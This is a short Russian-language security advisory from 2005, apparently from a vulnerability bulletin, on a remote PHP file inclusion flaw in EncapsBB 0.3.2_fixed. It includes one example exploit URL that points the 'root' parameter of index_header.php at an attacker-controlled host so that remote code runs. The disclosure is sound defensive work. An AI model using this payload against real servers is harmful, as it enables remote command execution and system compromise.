PHP-инклюдинг в EncapsBB

Дата публикации:
01.04.2005
Всего просмотров:
819
Опасность:
Высокая
Наличие исправления:
Нет
Количество уязвимостей:
1
CVSSv2 рейтинг:
CVE ID:
Нет данных
Вектор эксплуатации:
Удаленная
Воздействие:
Компрометация системы
CWE ID:
Нет данных
Наличие эксплоита:
Нет данных
Уязвимые продукты:
EncapsBB 0.x
Уязвимые версии: EncapsBB 0.3.2_fixed

Описание:
Уязвимость позволяет удаленному пользователю выполнить произвольные команды на уязвимой системе с привилегиями web сервера.

Уязвимость существует из-за отсутствия фильтрации входных данных в параметре root сценария 'index_header.php'. Удаленный пользователь может с помощью специально сформированного URL выполнить произвольный сценарий на уязвимой системе. Удачная эксплуатация уязвимости возможна при включенных опциях 'register_globals' и 'allow_url_fopen' в конфигурационном файле php. Пример:

http://[target]/research/boards/encapsbb-0.3.2_fixed/index_header.php?root=http://[attackerip]/

URL производителя: powerdev.com.ru

Решение: Способов устранения уязвимости не существует в настоящее время.

Ссылки: CGI Vuln in encapsbb0312 Board

или введите имя

CAPTCHA